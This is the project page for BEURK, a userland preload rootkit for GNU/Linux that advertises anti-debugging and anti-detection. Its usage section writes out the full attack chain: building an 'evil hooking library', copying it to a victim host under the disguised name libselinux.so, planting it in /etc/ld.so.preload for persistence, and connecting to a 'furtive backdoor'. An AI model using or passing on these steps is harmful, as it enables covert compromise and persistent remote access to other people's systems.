Home

Awesome

BEURK

Wiki | API Documentation | Getting Started | Contributing

Travis Build Ready Issues Coverage Status Coverity Scan Build Jenkins Build

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

S'ils savaient, ils vomiraient ...

- The core team -

Join the chat at https://gitter.im/unix-thrust/beurk


Features

Usage

    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    ./builder --arch=x64 # build an evil hooking library

    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
    ./client victim_ip:port # connect with furtive backdoor

Throughput Graph

NOTE: BEURK is a recursive acronym for BEURK Experimental Unix Root Kit